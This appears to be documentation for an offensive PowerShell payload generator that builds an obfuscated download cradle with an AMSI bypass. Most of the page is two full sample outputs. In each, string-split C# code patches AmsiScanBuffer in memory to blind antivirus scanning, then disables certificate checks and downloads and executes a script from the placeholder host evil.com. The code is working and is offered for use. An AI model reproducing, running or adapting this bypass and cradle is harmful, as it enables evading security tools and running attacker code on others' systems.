Table of Contents

Description

Generates an obfuscated PowerShell script and AMSI bypass to suppress AV interference before downloading and executing another script.

Overview

The purpose of this pipeline is to enable the download and execution of any PowerShell script in such as way that the script hosted at the specified URL does not require any obfuscation or modification. Simply run this pipeline with the URL where you are hosting the PowerShell script.

Parameters

Parameter Name	Type	Description
URL	string	The URL for the PowerShell script to run. This parameter is mandatory.
BypassTechnique	PwshAmsiBypassTechnique	The specific AMSI bypass technique to use. Default: ‘AmsiScanBufferStringReplace’.

Example

The command below, when run from a Specter, will generate an obfuscated PowerShell script that will download a PowerShell script hosted at https://www.evil.com/payload.ps1 and run it.

Get-Payload 'ps_generic_cradle' -Args @{
	URL = 'https://www.evil.com/payload.ps1'
}

The output will vary from run to run, but you will get something that looks like this:

if($PSVersionTable.PSVersion.Major -gt 2) {
    $subject = [string]::format("{0}{1}{2}{3}{4}{5}{6}{7}{8}{9}{10}{11}{12}{13}{14}{15}{16}{17}{18}{19}{20}{21}{22}{23}{24}{25}{26}{27}{28}{29}{30}{31}{32}{33}{34}{35}{36}{37}{38}{39}{40}{41}{42}{43}{44}{45}{46}{47}{48}{49}{50}{51}{52}{53}{54}{55}{56}{57}{58}{59}{60}{61}{62}{63}{64}{65}{66}{67}{68}{69}{70}{71}{72}{73}{74}{75}{76}{77}{78}{79}{80}{81}{82}{83}{84}{85}{86}{87}{88}{89}{90}{91}{92}{93}{94}{95}{96}{97}{98}{99}{100}{101}{102}{103}{104}{105}{106}{107}{108}{109}{110}{111}{112}{113}{114}{115}{116}{117}{118}{119}{120}{121}{122}{123}{124}{125}{126}{127}{128}{129}{130}{131}{132}{133}{134}{135}{136}{137}{138}{139}{140}{141}{142}{143}{144}{145}{146}{147}{148}{149}{150}{151}{152}{153}{154}{155}{156}{157}{158}{159}{160}{161}{162}{163}{164}{165}{166}{167}{168}{169}{170}{171}{172}{173}{174}{175}{176}{177}{178}{179}{180}{181}{182}{183}{184}{185}{186}{187}{188}{189}{190}{191}{192}{193}{194}{195}{196}{197}{198}{199}{200}{201}{202}{203}{204}{205}{206}{207}{208}{209}{210}{211}{212}{213}{214}{215}{216}{217}{218}{219}{220}{221}{222}{223}{224}{225}{226}{227}{228}{229}{230}{231}{232}{233}{234}{235}{236}{237}{238}{239}{240}{241}{242}{243}{244}{245}{246}{247}{248}{249}{250}{251}{252}{253}{254}{255}{256}{257}{258}{259}{260}{261}{262}{263}{264}{265}{266}{267}{268}{269}{270}{271}{272}{273}{274}{275}{276}{277}{278}{279}{280}{281}{282}{283}{284}{285}{286}{287}{288}{289}{290}{291}{292}{293}{294}{295}{296}{297}{298}{299}{300}{301}{302}{303}{304}{305}{306}{307}{308}{309}{310}{311}{312}{313}{314}{315}{316}{317}{318}{319}{320}{321}{322}{323}{324}{325}{326}{327}{328}{329}{330}{331}{332}{333}{334}{335}{336}{337}{338}{339}{340}{341}{342}{343}{344}{345}{346}{347}{348}{349}{350}{351}{352}{353}{354}{355}{356}{357}{358}{359}{360}{361}{362}{363}{364}{365}{366}{367}{368}{369}{370}{371}{372}{373}{374}{375}{376}{377}{378}{379}{380}{381}{382}{383}{384}{385}{386}{387}{388}{389}{390}{391}{392}{393}{394}{395}{396}{397}{398}{399}{400}{401}{402}{403}{404}{405}{406}{407}{408}{409}","us","in","g S","yste","m;`r`n","u","sin","g ","Syst","em",".Run","time",".Int","ero","pSer","vice","s;","`r`n`r`n","p","ubli","c"," cla","s","s C","o","ntro","l3Ws","uUni","on"," {`r`n","   ","  ","  "," [Dl","lIm","por","t(`"","kern","el","32","`")]","`r","`n  ","    "," "," p","ubl","ic ","stat","i","c ","ex","t","ern ","Int","Ptr"," G","etPr","ocAd","dres","s","(Int","P","t","r hM","od","ul","e",","," ","s","tri","ng ","pro","cN","a","m","e)",";`r","`n`r`n","  ","  ","    ","[","Dll","I","mp","or","t","(","`"k","erne","l32`"",")]","`r`n","   "," ","   "," pub","lic ","stat","ic"," e","xte","r","n I","ntPt","r ","Loa","dL","ib","rary","(st","r","ing"," nam","e);`r","`n`r`n ","  ","    "," [Dl","lImp","ort(","`"ker","nel","32","`")]","`r","`n ","   "," ","   ","pu","bl","ic s","tati","c ex","t","ern ","bool"," ","Virt","ualP","rote","ct(","In","t","Ptr ","lpA","dd","ress",","," ","U","I","ntPt","r d","wSi","z","e, u","i","nt ","f","lNew","P","rote","ct",","," o","ut u","int ","lpf","lOld","Pro","tec","t",")",";","`r`n","`r","`n","    ","  ","  pu","blic"," ","sta","ti","c ","IntP","t","r ","P","a","irin","g2M","eth","P","ars","ed(I","n","tPtr"," h","Modu","le,"," ","s","tri","ng ","p","rocN","ame",")"," {`r`n","   "," ","  ","  ","    ","r","et","u","rn C","on","tro","l3","Wsu","Unio","n.G","etPr","oc","A","dd","re","s","s(","hM","odu","l","e, p","rocN","a","me);","`r`n"," ","   "," ","  "," }","`r`n`r","`n ","  "," ","  ","  p","u","b","lic ","s","t","at","i","c In","tPt","r Un","der","l","ineM","of(","st","ring"," na","m","e) {","`r","`n"," ","   ","  "," "," "," ","  "," ","ret","urn ","Cont","r","ol3W","s","uU","ni","on",".Loa","dL","ibr","a","r","y(n","am","e);","`r`n","    "," ","   }","`r`n`r","`n ","  "," ","  ","  pu","bli","c s","t","atic"," b","ool ","Loa","ding","Matr","ix4x","4","(Int","Pt","r"," l","pA","d","dr","es","s",","," UIn","t","Ptr"," dwS","iz","e",", ","u","in","t ","flNe","wPr","ot","ect,"," out"," ","uint"," ","lpfl","Old","Pr","ote","ct",") ","{`r`n","  "," ","  ","  ","  ","   r","etur","n ","Con","tro","l3","Wsu","U","nion",".Vi","rt","ualP","ro","te","ct","(l","p","Ad","dre","s","s",","," dw","Si","ze,"," f","lNew","P","ro","tect",","," out"," lpf","l","Ol","dPro","t","ect",")",";`r","`n  ","    "," "," }","`r","`n  "," "," }")

    Add-Type $subject

    $computername = [Control3WsuUnion]::UnderlineMof(([string]::format("{0}{1}{2}{3}","a","m","si",".dll")))
    $function = [Control3WsuUnion]::Pairing2MethParsed($computername, ([string]::format("{0}{1}{2}{3}{4}{5}","Amsi","S","c","anBu","ff","er")))
    $method = 0
    [void][Control3WsuUnion]::LoadingMatrix4x4($function, [uint32]5, 0x40, [ref]$method)
    $allproperties = [Byte[]] (0xB8, 0x57, 0x00, 0x07, 0x80, 0xC3)
    [System.Runtime.InteropServices.Marshal]::Copy($allproperties, 0, $function, 6)
}

[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}; [scriptblock]::Create(((New-Object System.Net.WebClient).DownloadString(([string]::format("{0}{1}{2}{3}{4}{5}{6}{7}{8}{9}{10}{11}{12}{13}",'h','tt','ps:','//','www.','e','vi','l.c','om/p','a','yloa','d.','p','s1'))))).Invoke()
if($PSVersionTable.PSVersion.Major -gt 2) {
    $subject = [string]::format("{0}{1}{2}{3}{4}{5}{6}{7}{8}{9}{10}{11}{12}{13}{14}{15}{16}{17}{18}{19}{20}{21}{22}{23}{24}{25}{26}{27}{28}{29}{30}{31}{32}{33}{34}{35}{36}{37}{38}{39}{40}{41}{42}{43}{44}{45}{46}{47}{48}{49}{50}{51}{52}{53}{54}{55}{56}{57}{58}{59}{60}{61}{62}{63}{64}{65}{66}{67}{68}{69}{70}{71}{72}{73}{74}{75}{76}{77}{78}{79}{80}{81}{82}{83}{84}{85}{86}{87}{88}{89}{90}{91}{92}{93}{94}{95}{96}{97}{98}{99}{100}{101}{102}{103}{104}{105}{106}{107}{108}{109}{110}{111}{112}{113}{114}{115}{116}{117}{118}{119}{120}{121}{122}{123}{124}{125}{126}{127}{128}{129}{130}{131}{132}{133}{134}{135}{136}{137}{138}{139}{140}{141}{142}{143}{144}{145}{146}{147}{148}{149}{150}{151}{152}{153}{154}{155}{156}{157}{158}{159}{160}{161}{162}{163}{164}{165}{166}{167}{168}{169}{170}{171}{172}{173}{174}{175}{176}{177}{178}{179}{180}{181}{182}{183}{184}{185}{186}{187}{188}{189}{190}{191}{192}{193}{194}{195}{196}{197}{198}{199}{200}{201}{202}{203}{204}{205}{206}{207}{208}{209}{210}{211}{212}{213}{214}{215}{216}{217}{218}{219}{220}{221}{222}{223}{224}{225}{226}{227}{228}{229}{230}{231}{232}{233}{234}{235}{236}{237}{238}{239}{240}{241}{242}{243}{244}{245}{246}{247}{248}{249}{250}{251}{252}{253}{254}{255}{256}{257}{258}{259}{260}{261}{262}{263}{264}{265}{266}{267}{268}{269}{270}{271}{272}{273}{274}{275}{276}{277}{278}{279}{280}{281}{282}{283}{284}{285}{286}{287}{288}{289}{290}{291}{292}{293}{294}{295}{296}{297}{298}{299}{300}{301}{302}{303}{304}{305}{306}{307}{308}{309}{310}{311}{312}{313}{314}{315}{316}{317}{318}{319}{320}{321}{322}{323}{324}{325}{326}{327}{328}{329}{330}{331}{332}{333}{334}{335}{336}{337}{338}{339}{340}{341}{342}{343}{344}{345}{346}{347}{348}{349}{350}{351}{352}{353}{354}{355}{356}{357}{358}{359}{360}{361}{362}{363}{364}{365}{366}{367}{368}{369}{370}{371}{372}{373}{374}{375}{376}{377}{378}{379}{380}{381}{382}{383}{384}{385}{386}{387}{388}{389}{390}{391}{392}{393}{394}{395}{396}{397}{398}{399}","u","s","in","g ","S","y","st","e","m",";`r`nu","s","i","ng ","Sy","stem",".Ru","n","tim","e.I","nt","ero","pSer","vice","s",";`r`n`r","`n","publ","ic"," cl","ass ","C","ontr","ol3W","suUn","ion"," {`r`n","   ","    "," [Dl","l","Im","port","(","`"ker","ne","l32`"",")]","`r","`n  ","  "," ","  "," pu","blic"," sta","t","i","c ","ex","tern"," I","ntPt","r ","G","etPr","oc","A","ddr","ess","(","IntP","t","r hM","odu","le, ","str","ing ","p","rocN","a","me)",";`r`n`r","`n   ","  ","   [","DllI","m","p","o","rt(","`"ke","rn","el","32`")","]`r`n ","   ","   "," ","p","u","bli","c st","at","ic"," e","xter","n ","IntP","tr L","o","ad","L","ib","ra","ry","(s","t","r","in","g"," ","n","am","e",");`r","`n`r`n","    ","    ","[Dll","Im","p","ort","(`"ke","rnel","32`"",")]`r","`n ","  "," ","    ","pu","b","l","ic s","t","at","ic e","x","ter","n ","bo","ol"," Vi","r","tual","Pro","te","ct","(Int","Ptr ","l","pA","d","dr","e","ss,"," ","UIn","tPt","r d","w","Siz","e",", ","uin","t fl","NewP","ro","tect",", ","out"," ui","nt"," l","pflO","ldP","rote","ct);","`r`n`r`n"," ","  ","    "," pu","b","lic ","s","t","atic"," Int","Ptr"," ","Pa","ir","i","ng","2Met","hP","ar","se","d(In","tPt","r"," hM","odu","le",", ","stri","ng p","roc","Na","me)"," {","`r`n  ","   ","  "," ","    ","retu","rn ","Con","trol","3","Wsu","U","n","io","n",".G","e","tPro","cA","ddr","ess","(hMo","du","l","e,"," ","proc","Na","m","e)",";","`r`n ","    ","   }","`r`n","`r`n  ","    ","  ","p","ub","lic"," sta","tic ","Int","Pt","r ","Un","d","e","rli","neM","of(","stri","n","g n","ame)"," {","`r","`n  ","   ","    "," ","  r","etu","rn C","ontr","o","l3","WsuU","ni","on.","Loa","dLib","rary","(nam","e);`r","`n","   ","   ","  }`r","`n`r`n ","    "," ","  ","pub","lic"," st","atic"," ","boo","l ","Loa","din","gMa","tr","ix4","x","4","(Int","Ptr"," ","l","p","Addr","e","s","s, U","IntP","t","r dw","Size",", u","in","t fl","NewP","r","o","t","e","c","t,"," o","u","t"," uin","t lp","flOl","dP","rot","ec","t) ","{`r`n ","    "," ","   ","   r","etu","rn"," ","Co","ntro","l3W","suUn","i","on.V","irtu","al","Prot","ect","(l","pAd","d","ress",", d","w","Size",", fl","N","ewPr","ot","e","ct",", ","out ","lp","flOl","dPr","o","t","e","ct)",";`r`n","    ","    ","}","`r`n ","   ","}")

    Add-Type $subject

    $computername = [Control3WsuUnion]::UnderlineMof(([string]::format("{0}{1}{2}{3}{4}","am","s","i.d","l","l")))
    $function = [Control3WsuUnion]::Pairing2MethParsed($computername, ([string]::format("{0}{1}{2}{3}{4}{5}","A","msiS","can","Buff","e","r")))
    $method = 0
    [void][Control3WsuUnion]::LoadingMatrix4x4($function, [uint32]5, 0x40, [ref]$method)
    $allproperties = [Byte[]] (0xB8, 0x57, 0x00, 0x07, 0x80, 0xC3)
    [System.Runtime.InteropServices.Marshal]::Copy($allproperties, 0, $function, 6)
}

[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}; [scriptblock]::Create(((New-Object System.Net.WebClient).DownloadString(([string]::format("{0}{1}{2}{3}{4}{5}{6}{7}{8}{9}{10}",'htt','ps:/','/ww','w.e','vil.','co','m/','p','aylo','ad.p','s1'))))).Invoke()

Description

Overview

Parameters

Example

Share this: